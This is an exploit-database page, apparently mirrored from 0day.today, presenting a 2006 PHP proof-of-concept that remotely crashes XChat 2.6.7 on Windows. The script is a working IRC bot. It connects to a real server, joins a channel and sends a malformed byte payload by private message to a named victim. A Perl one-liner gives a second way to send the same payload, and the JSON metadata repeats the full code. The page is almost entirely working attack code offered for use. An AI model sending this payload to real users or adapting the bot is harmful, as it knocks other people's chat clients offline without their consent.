Search...

XChat <= 2.6.7 (win version) Remote Denial of Service Exploit (php)

2006-08-07T00:00:00

ID 1337DAY-ID-6181
Type zdt
Reporter ratboy
Modified 2006-08-07T00:00:00

Description

Exploit for unknown platform in category dos / poc

                                        
                                            ===================================================================
XChat &lt;= 2.6.7 (win version) Remote Denial of Service Exploit (php)
===================================================================




&lt;?
 # another way to test this with irssi/bitchx &lt;below&gt; /str0ke
 # /exec -o perl -e 'print "\x9x\xF0\x92\x8D\x85\xF1\xA5\x90\xB4\xF1\x96\x9E\x85\xF1\xA6\x8D\xA5\xF1\xB8\xA5\x85\xF1\xA7\x95\xA8\x29\xF2\x95\x95\x82"'
 ?&gt;

&lt;?php
// XChat &lt;= 2.6.7 Windows Remote Crash DoS by ratboy
// Tested on Windows SP1/SP2          
// The following bug was tested on the XChat &lt;= 2.6.7 on Windows SP1/SP2  

//Stop the script timing out
set_time_limit(0);

//Set constants
define("SERVER", 'irc.enigmagroup.org');
define("PORT", 6667);
define("CHANNEL", "#enigmagroup");  //Set the channel the bot will join here
define("NICK", "ratbot");    //Set the bot's nick here
define("EXPLOIT", "\x9x\xF0\x92\x8D\x85\xF1\xA5\x90\xB4\xF1\x96\x9E\x85\xF1\xA6\x8D\xA5\xF1\xB8\xA5\x85\xF1\xA7\x95\xA8\x29\xF2\x95\x95\x82");
define("VICTIM", "ratboy");

$socket = socket_create(AF_INET,SOCK_STREAM,SOL_TCP); // Create the Socket
$fp = socket_connect($socket, SERVER, PORT); // Connect to the server
socket_write($socket,"USER ratboy ratboy ratboy :ratboy\r\n"); // Send the Username to the server
socket_write($socket,"NICK ".NICK." \r\n"); // Change our nickname
socket_write($socket,"JOIN ".CHANNEL." \r\n"); // Join the channel
while($data = @socket_read($socket,2046)) { //read the data
    echo $data;
    $cmd = explode(" ", $data);

    if (strpos($data, "PING :")===0) {
        socket_write($socket, "PONG :".substr($data, 6)."\r\n");
        continue;
    }
    
    if($cmd[1] == "PRIVMSG"){  // Send the exploit right when the channel gets a message then stop the bot
        socket_write($socket, "PRIVMSG ".VICTIM." :".EXPLOIT."\r\n");
        socket_close($socket);
    }
}

?&gt; 



#  0day.today [2018-03-05]  #

JSON Vulners Source

Initial Source

{"id": "1337DAY-ID-6181", "type": "zdt", "bulletinFamily": "exploit", "title": "XChat <= 2.6.7 (win version) Remote Denial of Service Exploit (php)", "description": "Exploit for unknown platform in category dos / poc", "published": "2006-08-07T00:00:00", "modified": "2006-08-07T00:00:00", "cvss": {"score": 0.0, "vector": "NONE"}, "cvss2": {}, "cvss3": {}, "href": "https://0day.today/exploit/description/6181", "reporter": "ratboy", "references": [], "cvelist": [], "immutableFields": [], "lastseen": "2018-03-05T23:31:15", "viewCount": 6, "enchantments": {"score": {"value": 0.2, "vector": "NONE"}, "dependencies": {}, "backreferences": {}, "exploitation": null, "vulnersScore": 0.2}, "sourceHref": "https://0day.today/exploit/6181", "sourceData": "===================================================================\r\nXChat <= 2.6.7 (win version) Remote Denial of Service Exploit (php)\r\n===================================================================\r\n\r\n\r\n\r\n\r\n<?\r\n # another way to test this with irssi/bitchx <below> /str0ke\r\n # /exec -o perl -e 'print \"\\x9x\\xF0\\x92\\x8D\\x85\\xF1\\xA5\\x90\\xB4\\xF1\\x96\\x9E\\x85\\xF1\\xA6\\x8D\\xA5\\xF1\\xB8\\xA5\\x85\\xF1\\xA7\\x95\\xA8\\x29\\xF2\\x95\\x95\\x82\"'\r\n ?>\r\n\r\n<?php\r\n// XChat <= 2.6.7 Windows Remote Crash DoS by ratboy\r\n// Tested on Windows SP1/SP2 \r\n// The following bug was tested on the XChat <= 2.6.7 on Windows SP1/SP2 \r\n\r\n//Stop the script timing out\r\nset_time_limit(0);\r\n\r\n//Set constants\r\ndefine(\"SERVER\", 'irc.enigmagroup.org');\r\ndefine(\"PORT\", 6667);\r\ndefine(\"CHANNEL\", \"#enigmagroup\"); //Set the channel the bot will join here\r\ndefine(\"NICK\", \"ratbot\"); //Set the bot's nick here\r\ndefine(\"EXPLOIT\", \"\\x9x\\xF0\\x92\\x8D\\x85\\xF1\\xA5\\x90\\xB4\\xF1\\x96\\x9E\\x85\\xF1\\xA6\\x8D\\xA5\\xF1\\xB8\\xA5\\x85\\xF1\\xA7\\x95\\xA8\\x29\\xF2\\x95\\x95\\x82\");\r\ndefine(\"VICTIM\", \"ratboy\");\r\n\r\n$socket = socket_create(AF_INET,SOCK_STREAM,SOL_TCP); // Create the Socket\r\n$fp = socket_connect($socket, SERVER, PORT); // Connect to the server\r\nsocket_write($socket,\"USER ratboy ratboy ratboy :ratboy\\r\\n\"); // Send the Username to the server\r\nsocket_write($socket,\"NICK \".NICK.\" \\r\\n\"); // Change our nickname\r\nsocket_write($socket,\"JOIN \".CHANNEL.\" \\r\\n\"); // Join the channel\r\nwhile($data = @socket_read($socket,2046)) { //read the data\r\n echo $data;\r\n $cmd = explode(\" \", $data);\r\n\r\n if (strpos($data, \"PING :\")===0) {\r\n socket_write($socket, \"PONG :\".substr($data, 6).\"\\r\\n\");\r\n continue;\r\n }\r\n \r\n if($cmd[1] == \"PRIVMSG\"){ // Send the exploit right when the channel gets a message then stop the bot\r\n socket_write($socket, \"PRIVMSG \".VICTIM.\" :\".EXPLOIT.\"\\r\\n\");\r\n socket_close($socket);\r\n }\r\n}\r\n\r\n?> \r\n\r\n\r\n\n# 0day.today [2018-03-05] #", "_state": {"dependencies": 1647628850}}

XChat &lt;= 2.6.7 (win version) Remote Denial of Service Exploit (php)

Description

Exploit for unknown platform in category dos / poc

XChat <= 2.6.7 (win version) Remote Denial of Service Exploit (php)